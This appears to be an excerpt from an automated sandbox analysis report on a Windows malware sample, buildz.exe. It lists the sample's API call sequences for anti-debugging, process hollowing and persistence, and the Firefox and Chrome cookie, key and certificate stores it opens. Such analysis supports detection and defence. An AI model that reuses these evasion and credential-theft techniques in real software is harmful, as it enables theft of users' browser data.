          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00408D24 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00408D24
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00A2C0A3 push dword ptr fs:[00000030h]0_2_00A2C0A3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02310042 push dword ptr fs:[00000030h]0_2_02310042
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_00A420A3 push dword ptr fs:[00000030h]4_2_00A420A3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02280042 push dword ptr fs:[00000030h]4_2_02280042
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_008140A3 push dword ptr fs:[00000030h]5_2_008140A3
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02300042 push dword ptr fs:[00000030h]5_2_02300042
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401000
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0040ADD2 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040ADD2
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00404B02 SetUnhandledExceptionFilter,0_2_00404B02
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_004023D1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004023D1
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0049DB81 GetNumaProcessorNode,SetUnhandledExceptionFilter,0_2_0049DB81
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02310110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02310110
          Source: C:\Users\user\Desktop\buildz.exeMemory written: C:\Users\user\Desktop\buildz.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeMemory written: C:\Users\user\Desktop\buildz.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeMemory written: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeMemory written: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeMemory written: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe"Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Users\user\Desktop\buildz.exe "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStartJump to behavior
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeProcess created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023380F6 cpuid 0_2_023380F6
          Source: C:\Users\user\Desktop\buildz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_02350AB6
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0233C8B7
          Source: C:\Users\user\Desktop\buildz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0234394D
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_023449EA
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_02343F87
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
          Source: C:\Users\user\Desktop\buildz.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
          Source: C:\Users\user\Desktop\buildz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
          Source: C:\Users\user\Desktop\buildz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
          Source: C:\Users\user\Desktop\buildz.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
          Source: C:\Users\user\Desktop\buildz.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
          Source: C:\Users\user\Desktop\buildz.exeCode function: EnumSystemLocalesW,2_2_004387C8
          Source: C:\Users\user\Desktop\buildz.exeCode function: GetLocaleInfoW,2_2_0043884E
          Source: C:\Users\user\Desktop\buildz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
          Source: C:\Users\user\Desktop\buildz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
          Source: C:\Users\user\Desktop\buildz.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
          Source: C:\Users\user\Desktop\buildz.exeCode function: EnumSystemLocalesW,2_2_00437E27
          Source: C:\Users\user\Desktop\buildz.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
          Source: C:\Users\user\Desktop\buildz.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
          Source: C:\Users\user\Desktop\buildz.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
          Source: C:\Users\user\Desktop\buildz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_022C0AB6
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,4_2_022AC8B7
          Source: C:\Users\user\Desktop\buildz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,4_2_022B394D
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,4_2_022B49EA
          Source: C:\Users\user\Desktop\buildz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_022B3F87
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_02340AB6
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0232C8B7
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_0233394D
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_023349EA
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_02333F87
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00405D4A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00405D4A
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_0042FE47
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\search.json.mozlz4Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addonStartup.json.lz4Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pbJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\AlternateServices.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extension-preferences.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\times.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite-walJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ExperimentStoreData.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journalJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\xulstore.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\containers.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\handlers.jsonJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\parent.lockJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore.jsonlz4Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\pkcs11.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
